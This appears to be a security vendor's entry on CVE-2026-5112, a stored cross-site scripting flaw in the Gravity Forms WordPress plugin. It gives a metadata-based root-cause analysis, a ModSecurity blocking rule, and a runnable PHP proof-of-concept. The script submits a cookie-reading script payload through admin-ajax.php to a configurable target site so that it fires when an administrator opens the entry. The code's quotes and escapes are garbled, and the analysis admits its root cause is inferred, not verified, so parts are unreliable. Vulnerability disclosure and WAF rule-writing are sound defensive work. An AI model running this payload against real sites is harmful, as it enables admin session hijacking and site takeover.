CVE-2026-5112: Gravity Forms <= 2.10.0 – Unauthenticated Stored Cross-Site Scripting via Calculation Product Field in Repeater (gravityforms)

{
“analysis”: “Atomic Edge analysis of CVE-2026-5112 (metadata-based): This vulnerability allows unauthenticated stored cross-site scripting (XSS) in the Gravity Forms plugin for WordPress versions up to and including 2.10.0. The attack bypasses input validation in the Calculation product field type when used inside a Repeater field. Successful exploitation requires no authentication or user interaction, and the injected script executes when an administrator with the gravityforms_view_entries capability views the entry details page.

Root Cause: The vulnerability stems from three distinct failures in the plugin’s input handling chain. First, the GF_Field_Calculation::validate() method only validates the quantity subfield (.3) of a Calculation product field but completely ignores the product name subfield (.1). Second, the sanitize_entry_value() method returns the raw value without sanitization for fields where HTML is not expected, such as the product name. Third, the get_value_entry_detail() method in the Repeater field concatenates the unescaped product name directly into the output string without any escaping. Atomic Edge analysis infers this chain from the CWE-79 classification and the detailed vulnerability description, as no patch diff is available for direct code verification.

Exploitation: An unauthenticated attacker crafts a form submission targeting a Gravity Forms instance that uses a Calculation product field inside a Repeater field. The attacker supplies a malicious payload in the product name parameter (likely named input_{field_id}.1) while providing a legitimate numeric value in the quantity parameter (input_{field_id}.3). The payload, for example alert(document.cookie), passes validation because the product name field is never checked. The form submission endpoint is typically the standard WordPress admin-ajax.php with the gform_submit action, or the plugin’s built-in AJAX submission handler. The attacker does not need to know or provide any nonce, as the vulnerability lies in server-side validation logic that does not verify authentication.

Remediation: The fix in version 2.10.1 likely requires changes to all three vulnerable methods. The validate() method must sanitize the product name subfield (.1) using WordPress functions like wp_kses() or similar HTML-stripping functions. The sanitize_entry_value() method must apply output escaping via esc_html() or sanitize_text_field() to product name values before storage. The get_value_entry_detail() method in the Repeater field must escape output with esc_html() when rendering product names. These changes align with the CWE-79 pattern and are standard hardening practices for fields that may contain user-supplied text but should not contain HTML.

Impact: Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the browser of any administrator who views the compromised entry. This can lead to session hijacking via cookie theft, credential theft by injecting fake login forms, and potential privilege escalation if the attacker’s script interacts with the WordPress REST API or AJAX handlers as the administrator. The CVSS score of 7.2 (High) reflects the network-based, low-complexity nature of the attack with no required privileges or user interaction, though the impact is limited to confidentiality and integrity (no denial of service).”,
poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-5112 – Gravity Forms <= 2.10.0 – Unauthenticated Stored Cross-Site Scripting via Calculation Product Field in Repeaternn// Configuration – change these valuesn$target_url = 'http://example.com'; // Target WordPress site URL without trailing slashn$form_id = 1; // Replace with actual form ID that has a Calculation product field inside a Repeatern$field_id = 1; // Replace with the actual field ID of the Calculation product field (check form editor for the numeric ID)nn// The XSS payloadn$payload = 'alert(“XSS: “+document.cookie)’;nn// Build the submission datan// Standard Gravity Forms AJAX submission via admin-ajax.phpn$submit_url = $target_url . ‘/wp-admin/admin-ajax.php’;nn$post_data = array(n ‘action’ => ‘gform_submit’, // Standard Gravity Forms AJAX actionn ‘gform_submit’ => $form_id,n ‘is_submit_’ . $form_id => ‘1’,n ‘input_’ . $field_id . ‘.1’ => $payload, // Malicious product name (field .1 is the name)n ‘input_’ . $field_id . ‘.3’ => ‘1’, // Valid quantity (field .3 is the numeric quantity)n ‘gform_unique_id’ => ”, // Can be empty for unauthenticated submissionsn ‘state_’ . $form_id => ”, // Optional state parametern ‘target_page’ => ‘0’,n ‘source_page’ => ‘1’,n ‘gform_ajax’ => ‘1’, // Indicates AJAX submissionn);nn// Initialize cURLn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $submit_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(n ‘Content-Type: application/x-www-form-urlencoded’,n ‘User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36’,n));ncurl_setopt($ch, CURLOPT_COOKIE, ”); // No authentication neededncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing; set to true in productionncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);nn$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nn// Detect success – check for Gravity Forms specific response patternsnif ($http_code == 200 && strpos($response, ‘success’) !== false) {n echo “[+] Payload submitted successfully!\n”;n echo “[+] An administrator viewing the entry detail page for this submission will trigger the XSS.\n”;n echo “[+] The payload alert(\”XSS: \”+document.cookie) will execute in their browser.\n”;n} else {n echo “[!] Submission may have failed. HTTP code: ” . $http_code . “\n”;n echo “[!] Response (truncated): ” . substr($response, 0, 500) . “\n”;n echo “[!] Verify the form ID and field ID. The form must have a Calculation product field inside a Repeater.\n”;n}nn// Explanation:n// This PoC submits the XSS payload in the product name subfield (.1) of a Calculation product field.n// The quantity subfield (.3) receives a valid numeric value to pass server-side validation.n// The plugin’s validate() method only checks the quantity field, leaving the product name unsanitized.n// When the entry is viewed in wp-admin, the unescaped product name renders the XSS payload.n?>”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-5112 (metadata-based)n# Blocks unauthenticated stored XSS via Calculation product field in Gravity Forms Repeatern# Target: POST to admin-ajax.php with action gform_submit, injecting HTML in product name field (.1)nnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20265112,phase:2,deny,status:403,chain,msg:’CVE-2026-5112: Gravity Forms Unauthenticated Stored XSS via Calculation Product Field in Repeater’,severity:’CRITICAL’,tag:’CVE-2026-5112′,tag:’wordpress’,tag:’gravityforms'”n SecRule ARGS_POST:action “@streq gform_submit” \n “chain”n SecRule ARGS_POST:/input_\d+\.1/ “@rx ]*script|onerror|onload|onmouseover|javascript:” \n “t:lowercase,chain”n SecRule ARGS_POST:/input_\d+\.3/ “@rx ^\d+$””
}